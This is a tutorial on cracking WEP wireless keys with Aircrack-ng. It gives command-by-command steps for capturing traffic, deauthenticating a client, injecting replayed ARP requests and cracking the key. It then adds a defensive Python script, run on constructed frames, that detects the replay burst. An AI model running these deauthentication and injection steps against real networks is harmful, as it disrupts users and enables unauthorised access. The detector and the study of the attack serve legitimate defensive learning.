WEP Attack: Packet Injection Guide

TL;DR

This guide explains how to inject packets during a WEP attack using tools like Aircrack-ng. It’s for educational purposes only – attacking networks without permission is illegal.

Prerequisites

  • A wireless network interface capable of monitor mode and packet injection (check with iwconfig).
  • The Aircrack-ng suite installed.
  • Root privileges.

Steps

  1. Put your Wireless Interface into Monitor Mode

    First, identify your wireless interface name (e.g., wlan0). Then use airmon-ng start <interface_name> to put it into monitor mode. This creates a new virtual interface (e.g., mon0).

    sudo airmon-ng start wlan0

  2. Find the Target Network

    Use airodump-ng <monitor_interface> to scan for nearby wireless networks. Identify the BSSID (MAC address) of your target network.

    sudo airodump-ng mon0

  3. Capture Packets

    Start capturing packets from the target network using airodump-ng -w <output_file> --bssid <target_BSSID> <monitor_interface>. This saves captured data to files.

    sudo airodump-ng -w capture --bssid 00:11:22:33:44:55 mon0

  4. Deauthenticate a Client

    To generate traffic, you need to deauthenticate a connected client. Use aireplay-ng -0 1 -a <target_BSSID> -c <client_MAC> <monitor_interface>. The -0 option selects deauthentication mode and takes the number of deauthentication frames to send; without an attack mode, aireplay-ng does not run. Replace <client_MAC> with the MAC address of a connected client (found in the airodump-ng output).

    sudo aireplay-ng -0 1 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0

  5. Inject Packets (ARP Request Injection)

    This is the core of the attack. We’ll inject ARP request packets to flood the network and capture enough IVs for cracking.

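    Use aireplay-ng -3 -b <target_BSSID> -h <client_MAC> <monitor_interface> to inject ARP requests. The -3 option selects ARP request replay mode, and -h sets the source MAC address of the injected frames (here, the client from step 4, not the access point's BSSID). The tool replays a captured ARP request; WEP has no replay protection, so the target access point retransmits each copy under a new IV.

    sudo aireplay-ng -3 -b 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0

  6. Check for Sufficient IVs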

    Monitor the airodump-ng output. You need to collect enough IVs (Initialization Vectors) – typically several thousand – before attempting to crack the WEP key.

  7. Crack the WEP Key

    Once you have sufficient IVs, use aircrack-ng <output_file>.cap to attempt to crack the WEP key. This process can take time depending on the number of IVs collected and the network’s configuration.

    sudo aircrack-ng capture*.cap

  8. Stop Monitor Mode

    After finishing, stop monitor mode using airmon-ng stop <monitor_interface>.

    sudo airmon-ng stop mon0
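
Seen from the defender's side, the ARP request injection in step 5 leaves a distinctive trace: because WEP has no replay protection, the injected frames are verbatim copies that all carry one IV, often right after a deauthentication frame. The following detection logic is an added example, not part of the original guide; the record fields (ts, type, src, bssid, iv, length), the thresholds and the sample frames are assumptions constructed for illustration.

```python
from collections import defaultdict, deque

def detect_arp_replay(frames, window=1.0, threshold=20, deauth_gap=60.0):
    """Flag a transmitter that sends the same WEP frame (same IV and length)
    at least `threshold` times within `window` seconds. Normal 802.11 retries
    reuse an IV only a handful of times, so the threshold separates the two."""
    recent = defaultdict(deque)   # (bssid, src, iv, length) -> timestamps in window
    last_deauth = {}              # bssid -> time of the latest deauth frame
    alerts = {}
    for f in sorted(frames, key=lambda f: f["ts"]):
        if f["type"] == "deauth":
            last_deauth[f["bssid"]] = f["ts"]
            continue
        key = (f["bssid"], f["src"], f["iv"], f["length"])
        seen = recent[key]
        seen.append(f["ts"])
        while seen[0] < f["ts"] - window:
            seen.popleft()
        if len(seen) >= threshold and key not in alerts:
            deauth_ts = last_deauth.get(f["bssid"])
            alerts[key] = {
                "bssid": f["bssid"], "src": f["src"], "iv": f["iv"],
                "first_seen": seen[0], "copies_in_window": len(seen),
                # A deauth shortly before the burst matches steps 4 and 5 above.
                "deauth_before": deauth_ts is not None
                                 and f["ts"] - deauth_ts <= deauth_gap,
            }
    return list(alerts.values())

def sample_frames():
    """Constructed records (not a real capture): ordinary client traffic with
    a fresh IV per frame, one deauth, then 200 copies of a single frame."""
    ap, client = "00:11:22:33:44:55", "AA:BB:CC:DD:EE:FF"
    frames = [{"ts": i * 0.05, "type": "data", "src": client, "bssid": ap,
               "iv": f"{i:06x}", "length": 120 + i % 7} for i in range(40)]
    frames.append({"ts": 2.1, "type": "deauth", "src": ap, "bssid": ap})
    frames += [{"ts": 3.0 + i * 0.002, "type": "data", "src": client,
                "bssid": ap, "iv": "a1b2c3", "length": 68} for i in range(200)]
    return frames

if __name__ == "__main__":
    for alert in detect_arp_replay(sample_frames()):
        print(alert)
```

On the constructed input, the ordinary traffic raises nothing and the burst produces a single alert for the repeated IV. An alert of this kind on a production network is also a prompt to move the affected access point off WEP.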

Important Notes

  • Legality: Attacking networks without permission is illegal. This guide is for educational purposes only.
  • Hardware Compatibility: Not all wireless interfaces support monitor mode and packet injection.
  • Network Configuration: Some WEP implementations are more resistant to attacks than others.